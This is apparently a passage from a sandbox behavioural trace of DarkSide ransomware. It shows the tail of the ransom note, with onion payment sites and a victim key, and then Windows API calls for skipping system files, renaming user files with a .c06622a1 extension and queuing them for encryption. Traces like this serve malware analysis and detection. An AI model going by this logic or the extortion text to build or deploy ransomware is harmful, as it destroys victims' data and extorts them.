world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0150.686] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0150.686] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fde0c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fde0c*=0xa8f, lpOverlapped=0x0) returned 1 [0150.687] CloseHandle (hObject=0x678) returned 1 [0150.687] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0150.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn")) returned 0x10 [0150.687] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\") returned="" [0150.687] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\") returned 0x72 [0150.687] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe06c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe06c) returned 0x2db8880 [0150.688] FindNextFileW (in: hFindFile=0x2db8880, lpFindFileData=0x3fe06c | out: lpFindFileData=0x3fe06c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e20050, ftCreationTime.dwHighDateTime=0x1d5da77, ftLastAccessTime.dwLowDateTime=0xd86e8800, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd86e8800, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.688] FindNextFileW (in: hFindFile=0x2db8880, lpFindFileData=0x3fe06c | out: lpFindFileData=0x3fe06c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd376f530, ftCreationTime.dwHighDateTime=0x1d5d7c7, ftLastAccessTime.dwLowDateTime=0x3565b1c0, ftLastAccessTime.dwHighDateTime=0x1d5db63, ftLastWriteTime.dwLowDateTime=0x3565b1c0, ftLastWriteTime.dwHighDateTime=0x1d5db63, nFileSizeHigh=0x0, nFileSizeLow=0xaef0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nZ3pb9dWPNfCrTgYkw.wav", cAlternateFileName="NZ3PB9~1.WAV")) returned 1 [0150.689] _wcsicmp (_Str1="nZ3pb9dWPNfCrTgYkw.wav", _Str2="README.c06622a1.TXT") returned -4 [0150.689] wcsstr (_Str="nZ3pb9dWPNfCrTgYkw.wav", _SubStr="README") returned 0x0 [0150.689] _wcsicmp (_Str1="autorun.inf", _Str2="nZ3pb9dWPNfCrTgYkw.wav") returned -13 [0150.689] wcslen (_String="autorun.inf") returned 0xb [0150.689] _wcsicmp (_Str1="boot.ini", _Str2="nZ3pb9dWPNfCrTgYkw.wav") returned -12 [0150.689] wcslen (_String="boot.ini") returned 0x8 [0150.689] _wcsicmp (_Str1="bootfont.bin", _Str2="nZ3pb9dWPNfCrTgYkw.wav") returned -12 [0150.689] wcslen (_String="bootfont.bin") returned 0xc [0150.689] _wcsicmp (_Str1="bootsect.bak", _Str2="nZ3pb9dWPNfCrTgYkw.wav") returned -12 [0150.689] wcslen (_String="bootsect.bak") returned 0xc [0150.689] _wcsicmp (_Str1="desktop.ini", _Str2="nZ3pb9dWPNfCrTgYkw.wav") returned -10 [0150.689] wcslen (_String="desktop.ini") returned 0xb [0150.689] _wcsicmp (_Str1="iconcache.db", _Str2="nZ3pb9dWPNfCrTgYkw.wav") returned -5 [0150.689] wcslen (_String="iconcache.db") returned 0xc [0150.689] _wcsicmp (_Str1="ntldr", _Str2="nZ3pb9dWPNfCrTgYkw.wav") returned -6 [0150.689] wcslen (_String="ntldr") returned 0x5 [0150.689] _wcsicmp (_Str1="ntuser.dat", _Str2="nZ3pb9dWPNfCrTgYkw.wav") returned -6 [0150.689] wcslen (_String="ntuser.dat") returned 0xa [0150.689] _wcsicmp (_Str1="ntuser.dat.log", _Str2="nZ3pb9dWPNfCrTgYkw.wav") returned -6 [0150.689] wcslen (_String="ntuser.dat.log") returned 0xe [0150.689] _wcsicmp (_Str1="ntuser.ini", _Str2="nZ3pb9dWPNfCrTgYkw.wav") returned -6 [0150.689] wcslen (_String="ntuser.ini") returned 0xa [0150.689] _wcsicmp (_Str1="thumbs.db", _Str2="nZ3pb9dWPNfCrTgYkw.wav") returned 6 [0150.689] wcslen (_String="thumbs.db") returned 0x9 [0150.689] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0150.689] wcslen (_String="386") returned 0x3 [0150.689] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0150.689] wcslen (_String="adv") returned 0x3 [0150.689] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0150.689] wcslen (_String="ani") returned 0x3 [0150.689] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0150.689] wcslen (_String="bat") returned 0x3 [0150.689] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0150.689] wcslen (_String="bin") returned 0x3 [0150.689] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0150.689] wcslen (_String="cab") returned 0x3 [0150.689] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0150.690] wcslen (_String="cmd") returned 0x3 [0150.690] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0150.690] wcslen (_String="com") returned 0x3 [0150.690] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0150.690] wcslen (_String="cpl") returned 0x3 [0150.690] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0150.690] wcslen (_String="cur") returned 0x3 [0150.690] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0150.690] wcslen (_String="deskthemepack") returned 0xd [0150.690] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0150.690] wcslen (_String="diagcab") returned 0x7 [0150.690] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0150.690] wcslen (_String="diagcfg") returned 0x7 [0150.690] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0150.690] wcslen (_String="diagpkg") returned 0x7 [0150.690] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0150.690] wcslen (_String="dll") returned 0x3 [0150.690] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0150.690] wcslen (_String="drv") returned 0x3 [0150.690] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0150.690] wcslen (_String="exe") returned 0x3 [0150.690] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0150.690] wcslen (_String="hlp") returned 0x3 [0150.690] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0150.690] wcslen (_String="icl") returned 0x3 [0150.690] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0150.690] wcslen (_String="icns") returned 0x4 [0150.690] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0150.690] wcslen (_String="ico") returned 0x3 [0150.690] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0150.690] wcslen (_String="ics") returned 0x3 [0150.690] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0150.690] wcslen (_String="idx") returned 0x3 [0150.690] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0150.690] wcslen (_String="ldf") returned 0x3 [0150.690] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0150.690] wcslen (_String="lnk") returned 0x3 [0150.690] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0150.691] wcslen (_String="mod") returned 0x3 [0150.691] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0150.691] wcslen (_String="mpa") returned 0x3 [0150.691] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0150.691] wcslen (_String="msc") returned 0x3 [0150.691] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0150.691] wcslen (_String="msp") returned 0x3 [0150.691] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0150.691] wcslen (_String="msstyles") returned 0x8 [0150.691] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0150.691] wcslen (_String="msu") returned 0x3 [0150.691] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0150.691] wcslen (_String="nls") returned 0x3 [0150.691] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0150.691] wcslen (_String="nomedia") returned 0x7 [0150.691] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0150.691] wcslen (_String="ocx") returned 0x3 [0150.691] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0150.691] wcslen (_String="prf") returned 0x3 [0150.691] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0150.691] wcslen (_String="ps1") returned 0x3 [0150.691] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0150.691] wcslen (_String="rom") returned 0x3 [0150.691] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0150.691] wcslen (_String="rtp") returned 0x3 [0150.691] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0150.691] wcslen (_String="scr") returned 0x3 [0150.691] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0150.691] wcslen (_String="shs") returned 0x3 [0150.691] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0150.691] wcslen (_String="spl") returned 0x3 [0150.691] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0150.691] wcslen (_String="sys") returned 0x3 [0150.691] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0150.691] wcslen (_String="theme") returned 0x5 [0150.691] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0150.691] wcslen (_String="themepack") returned 0x9 [0150.691] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0150.692] wcslen (_String="wpx") returned 0x3 [0150.692] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0150.692] wcslen (_String="lock") returned 0x4 [0150.692] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0150.692] wcslen (_String="key") returned 0x3 [0150.692] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0150.692] wcslen (_String="hta") returned 0x3 [0150.692] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0150.692] wcslen (_String="msi") returned 0x3 [0150.692] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0150.692] wcslen (_String="pdb") returned 0x3 [0150.692] _wcsicmp (_Str1="sql", _Str2="wav") returned -4 [0150.692] wcslen (_String="sql") returned 0x3 [0150.692] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0150.692] wcslen (_String="sqlite") returned 0x6 [0150.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn")) returned 0x10 [0150.692] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45c00f0 [0150.692] wcscpy (in: _Dest=0x45c00f0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" [0150.692] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn") returned 0x71 [0150.692] wcscpy (in: _Dest=0x45c01d4, _Source="nZ3pb9dWPNfCrTgYkw.wav" | out: _Dest="nZ3pb9dWPNfCrTgYkw.wav") returned="nZ3pb9dWPNfCrTgYkw.wav" [0150.692] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\nZ3pb9dWPNfCrTgYkw.wav", dwFileAttributes=0x80) returned 1 [0150.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\nZ3pb9dWPNfCrTgYkw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\nz3pb9dwpnfcrtgykw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x658 [0150.693] SetFilePointerEx (in: hFile=0x658, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.693] ReadFile (in: hFile=0x658, lpBuffer=0x3fdef4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fdf84, lpOverlapped=0x0 | out: lpBuffer=0x3fdef4*, lpNumberOfBytesRead=0x3fdf84*=0x90, lpOverlapped=0x0) returned 1 [0150.694] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fdef4, Length=0x80) returned 0xba2e87c6 [0150.694] RtlComputeCrc32 (PartialCrc=0x87c6, Buffer=0x3fdef4, Length=0x80) returned 0x7b9ce43f [0150.694] RtlComputeCrc32 (PartialCrc=0xe43f, Buffer=0x3fdef4, Length=0x80) returned 0x8dd226c5 [0150.694] RtlComputeCrc32 (PartialCrc=0x26c5, Buffer=0x3fdef4, Length=0x80) returned 0x6fcb8fc0 [0150.694] RtlComputeCrc32 (PartialCrc=0x8fc0, Buffer=0x3fdef4, Length=0x80) returned 0x7bc7d431 [0150.694] CloseHandle (hObject=0x658) returned 1 [0150.694] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45d00f8 [0150.694] wcscpy (in: _Dest=0x45d00f8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\nZ3pb9dWPNfCrTgYkw.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\nZ3pb9dWPNfCrTgYkw.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\nZ3pb9dWPNfCrTgYkw.wav" [0150.694] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\nZ3pb9dWPNfCrTgYkw.wav") returned 0x88 [0150.694] wcscpy (in: _Dest=0x45d0208, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.694] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\nZ3pb9dWPNfCrTgYkw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\nz3pb9dwpnfcrtgykw.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\nZ3pb9dWPNfCrTgYkw.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\nz3pb9dwpnfcrtgykw.wav.c06622a1"), dwFlags=0x8) returned 1 [0150.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\nZ3pb9dWPNfCrTgYkw.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\nz3pb9dwpnfcrtgykw.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x658 [0150.697] CreateIoCompletionPort (FileHandle=0x658, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.697] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4820020 [0150.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xc2afcd8 [0150.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4fb5be30 [0150.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1cdcc83e [0150.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x267e7319 [0150.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x40643ed5 [0150.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7f4c129d [0150.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x380b01d3 [0150.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x32acf988 [0150.705] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4820094, Length=0x80) returned 0xa2a48111 [0150.705] RtlComputeCrc32 (PartialCrc=0x8111, Buffer=0x4820094, Length=0x80) returned 0x93d6a635 [0150.705] RtlComputeCrc32 (PartialCrc=0xa635, Buffer=0x4820094, Length=0x80) returned 0xb720534a [0150.705] RtlComputeCrc32 (PartialCrc=0x534a, Buffer=0x4820094, Length=0x80) returned 0x5706a997 [0150.705] RtlComputeCrc32 (PartialCrc=0xa997, Buffer=0x4820094, Length=0x80) returned 0xa4bdc8f8 [0150.705] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0150.705] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45c00f0) returned 1 [0150.705] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45d00f8) returned 1 [0150.705] FindNextFileW (in: hFindFile=0x2db8880, lpFindFileData=0x3fe06c | out: lpFindFileData=0x3fe06c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84553d60, ftCreationTime.dwHighDateTime=0x1d5dfae, ftLastAccessTime.dwLowDateTime=0x96673340, ftLastAccessTime.dwHighDateTime=0x1d5e450, ftLastWriteTime.dwLowDateTime=0x96673340, ftLastWriteTime.dwHighDateTime=0x1d5e450, nFileSizeHigh=0x0, nFileSizeLow=0xbd47, dwReserved0=0x0, dwReserved1=0x0, cFileName="piZ3fb2N-l-_YFHpWOlt.m4a", cAlternateFileName="PIZ3FB~1.M4A")) returned 1 [0150.705] _wcsicmp (_Str1="piZ3fb2N-l-_YFHpWOlt.m4a", _Str2="README.c06622a1.TXT") returned -2 [0150.705] wcsstr (_Str="piZ3fb2N-l-_YFHpWOlt.m4a", _SubStr="README") returned 0x0 [0150.705] _wcsicmp (_Str1="autorun.inf", _Str2="piZ3fb2N-l-_YFHpWOlt.m4a") returned -15 [0150.706] wcslen (_String="autorun.inf") returned 0xb [0150.706] _wcsicmp (_Str1="boot.ini", _Str2="piZ3fb2N-l-_YFHpWOlt.m4a") returned -14 [0150.706] wcslen (_String="boot.ini") returned 0x8 [0150.706] _wcsicmp (_Str1="bootfont.bin", _Str2="piZ3fb2N-l-_YFHpWOlt.m4a") returned -14 [0150.706] wcslen (_String="bootfont.bin") returned 0xc [0150.706] _wcsicmp (_Str1="bootsect.bak", _Str2="piZ3fb2N-l-_YFHpWOlt.m4a") returned -14 [0150.706] wcslen (_String="bootsect.bak") returned 0xc [0150.706] _wcsicmp (_Str1="desktop.ini", _Str2="piZ3fb2N-l-_YFHpWOlt.m4a") returned -12 [0150.706] wcslen (_String="desktop.ini") returned 0xb [0150.706] _wcsicmp (_Str1="iconcache.db", _Str2="piZ3fb2N-l-_YFHpWOlt.m4a") returned -7 [0150.706] wcslen (_String="iconcache.db") returned 0xc [0150.706] _wcsicmp (_Str1="ntldr", _Str2="piZ3fb2N-l-_YFHpWOlt.m4a") returned -2 [0150.706] wcslen (_String="ntldr") returned 0x5 [0150.706] _wcsicmp (_Str1="ntuser.dat", _Str2="piZ3fb2N-l-_YFHpWOlt.m4a") returned -2 [0150.706] wcslen (_String="ntuser.dat") returned 0xa [0150.706] _wcsicmp (_Str1="ntuser.dat.log", _Str2="piZ3fb2N-l-_YFHpWOlt.m4a") returned -2 [0150.706] wcslen (_String="ntuser.dat.log") returned 0xe [0150.706] _wcsicmp (_Str1="ntuser.ini", _Str2="piZ3fb2N-l-_YFHpWOlt.m4a") returned -2 [0150.706] wcslen (_String="ntuser.ini") returned 0xa [0150.706] _wcsicmp (_Str1="thumbs.db", _Str2="piZ3fb2N-l-_YFHpWOlt.m4a") returned 4 [0150.706] wcslen (_String="thumbs.db") returned 0x9 [0150.706] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0150.706] wcslen (_String="386") returned 0x3 [0150.706] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0150.706] wcslen (_String="adv") returned 0x3 [0150.706] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0150.706] wcslen (_String="ani") returned 0x3 [0150.706] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0150.706] wcslen (_String="bat") returned 0x3 [0150.706] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0150.706] wcslen (_String="bin") returned 0x3 [0150.706] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0150.706] wcslen (_String="cab") returned 0x3 [0150.706] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0150.706] wcslen (_String="cmd") returned 0x3 [0150.706] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0150.706] wcslen (_String="com") returned 0x3 [0150.706] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0150.707] wcslen (_String="cpl") returned 0x3 [0150.707] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0150.707] wcslen (_String="cur") returned 0x3 [0150.707] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0150.707] wcslen (_String="deskthemepack") returned 0xd [0150.707] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0150.707] wcslen (_String="diagcab") returned 0x7 [0150.707] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0150.707] wcslen (_String="diagcfg") returned 0x7 [0150.707] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0150.707] wcslen (_String="diagpkg") returned 0x7 [0150.707] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0150.707] wcslen (_String="dll") returned 0x3 [0150.707] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0150.707] wcslen (_String="drv") returned 0x3 [0150.707] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0150.707] wcslen (_String="exe") returned 0x3 [0150.707] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0150.707] wcslen (_String="hlp") returned 0x3 [0150.707] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0150.707] wcslen (_String="icl") returned 0x3 [0150.707] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0150.707] wcslen (_String="icns") returned 0x4 [0150.707] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0150.707] wcslen (_String="ico") returned 0x3 [0150.707] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0150.707] wcslen (_String="ics") returned 0x3 [0150.707] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0150.707] wcslen (_String="idx") returned 0x3 [0150.707] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 